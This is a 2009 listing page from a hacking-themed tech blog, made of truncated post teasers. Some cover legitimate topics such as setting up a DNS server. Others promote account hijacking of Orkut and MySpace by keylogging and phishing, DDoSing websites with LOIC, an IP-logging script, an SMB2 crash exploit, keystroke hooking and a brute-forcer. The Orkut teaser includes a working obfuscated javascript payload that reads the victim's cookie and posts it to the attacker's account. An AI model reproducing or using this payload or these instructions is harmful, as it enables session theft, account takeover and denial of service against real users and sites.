September 2009

This is  a simple article to setup a DNS Server in Ubuntu. Please follow the steps to make this.  Setting up DNS Server is used to serve the new domain names using your IP. This is kind of providing webhosting.

Step1: We need to install bind 9 for this

Read more..

Your rating: None Average: 3.3 (4 votes)

This application will generate network unlock codes for your mobile phone which you simply enter into the phone keypad to unlock your phone to all networks

Usage:
remove your sim card and switch on the phone

type *#06# to get phone serial number and enter this into the program along with your phone model number and current network

click on calculate button and you will receive a list of unlock codes
(i usually find that either the first or last code works fine)

enter the code into your phone (use the * key for the pw+ characters)

your phone will say something like 'sim restrictions lifted' and then reboot itself

thats it you can now use any simcard in your phone

Download:
Your rating: None Average: 4.3 (23 votes)

Features:
* Download any book from Google Books marked as 'Full view'
* Partially download any book from Google Books marked as 'Limited preview'
* Access to any book available only for US citizens
* Searching for hidden pages (not indexed by Google Books)


download
Your rating: None Average: 3.9 (11 votes)

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file.Read more..
    Your rating: None Average: 3.6 (20 votes)

Going through the searches and links on the email, I came across this fantastic way of viewing content that requires registration, without actually registering for these sites.

Trick I use is to visit BugMeNot and in the search box, enter the webite you want to view content from, for exampleNyTimes. This will then give you a list of usernames and passwords that you can use to login to the website and view the content. Along with the username and passwords, it provides their accuracy percentage. This way, you dont have to go through the annoyance of registering yourself.
Read more..
Your rating: None Average: 3.6 (5 votes)

Intercepting keystrokes

Hooking Key Events

There are different ways to catch the keys as they are being typed, but one of the most efficient is to monitor system events for key events. This is done with a hook, which forces Windows to call your own functions when a certain type of event happens.

First, let's see how you can set a hook to catch keyboard events, with SetWindowsHookEx(): Read more..

Your rating: None Average: 4.6 (7 votes)


[Laurent Gaffi?] has discovered an exploit that effects Windows Vista, Windows 7, and possibly Windows Server 2008 (unconfirmed). This method attacks via the NEGOTIATE PROTOCOL REQUEST which is the first SMB query sent. The vulnerability is present only on Windows versions that include Server Message Block 2.0 and have the protocol enabled. A successful attack requires no local access to the machine and results in a Blue Screen of Death.

POC
==========================================================
Smb-Bsod.py:

#!/usr/bin/pythonRead more..
Your rating: None Average: 3 (2 votes)

                
                       Techmantras is one year old now and the way Techmantras has progressed over the past one year is nothing short of outstanding. On this memorable day I would like to tell about our past one year journey. We registered Techmantras in January 08 and came online in September 08.We had out fair share of difficulties in between. We being students found it difficult to come online regularly but we still continued with the same zeal and passion. We created the site framework quickly and started posting. But technical work was and is never finished. We make modifications every day. We also see to it that we maintain the quality of our content.
Read more..
Your rating: None Average: 3.5 (2 votes)


PERHAPS YOU HAVE BOUGHT A PHONE AND WANT TO CLONE IT WITH ANOTHER PHONE THAT YOU HAVE IN USE THAT IS OLDER OR SOMETHING. WE WILL GO OVER THE BASICS OF WHAT YOU NEED TO CLONE A CELL PHONE:

1) SYSTEM ID
2) AREA CODE
3) CELL PHONE NUMBER



1) SYSTEM IDRead more..
Your rating: None Average: 4 (3 votes)


In HITBSecConf2009 Vipin Kumar (Founder nvLabs.in) demonstrated how easily Windows 7 can be attacked via boot sectors using Vbootkit 2.0. 

He demonstrated
Read more..
Your rating: None Average: 3.7 (7 votes)

I will teach you how to make a basic Auto-Hacking USB Drive. There are probably many different variationsof this. I will be showing you the most basic.

You need two things:
1) A USB Drive devoted to this
2) The programs and files that I will show you how to make or where to get. If you have trouble making the two files that I show you how to create, they can be downloaded at the end.
Read more..
Your rating: None Average: 3.5 (4 votes)

In this tutorial, I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
Read more..
Your rating: None Average: 2 (6 votes)

Introduction

A very easy way to connect two PCs is using a USB-USB cable. Connecting two PCs with a cable like this you can transfer files from one PC to another, and even build a small network and share your Internet connection with a second PC. In this tutorial we will explain you how to connect two PCs using a cable like this.Read more..

Your rating: None Average: 4 (4 votes)

Disclaimer

TechMantras is definitely not a site that promotes or encourages computer hacking (unethical), but rather it is a Technology & Computer Security related website. In fact, Computer Hacking and Computer Security are the two concepts that goes hand-in-hand. They are like the two faces of the same coin. So with the existence of close proximity between Hacking and Security, it is more likely that people often mistake our site to be one that promotes Hacking. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks.  Know Hacking but No Hacking!

Your usage of this website constitutes your agreement to the following terms.
Read more..


MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post you’ll fine the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of  facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.Read more..

Your rating: None Average: 2 (1 vote)

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.Read more..

Your rating: None Average: 3.3 (3 votes)

First get firefox and the cookie editor plugin for it...they will be required in this operation.

Then make two fake accounts...u will ned one
to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised.Its your choice.

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
Read more..
Your rating: None Average: 2.5 (6 votes)

“Offensive Security 101 v.2.0? is a course designed for network administrators and security professionals who need to get acquainted with the world of offensive security. The course introduces the latest hacking tools and techniques, and includes remote live labs for exercising the material presented to the students.

This course gives a solid understanding of the penetration testing process, and is equally important for those wanting to either defend or attack their network.

Offensive Security 101 v.2.0 qualifies you for 40 ISC2 CPE Credits. This applies to students who submit their exercise documentation at the end of the course, or pass the certification challenge.
Read more..
Your rating: None Average: 3.2 (12 votes)



Windows 7 could be one of Microsoft's greatest operating systems, if it fulfills the promise shown by the unofficial beta version (build 7000) we have been testing for the past couple of days.

What's New?
Improved taskbar and full-screen previews
The taskbar at the bottom of your screen is what you use to launch programs and switch between them when they're open. In Windows 7 you can pin any program to the taskbar so it’s always just a click away, and you can rearrange the icons on the taskbar just by clicking and dragging. We’ve made the icons considerably bigger, too, so they’re easier to use. Hover over the icons and you’ll see thumbnails of every file or window that open in that program, and if you hover over the thumbnail, you’ll see a full-screen preview of that window. Move the cursor off the thumbnail and the full-screen preview disappears

Jump Lists Read more..
Your rating: None Average: 2.8 (5 votes)

Search

Loading

Sponsered links

Bookmark Us!

Share/Save

Page Rank

Quotes

Not all problems have a technological answer, but when they do, that is the more lasting solution.

Explore Tags

Follow Us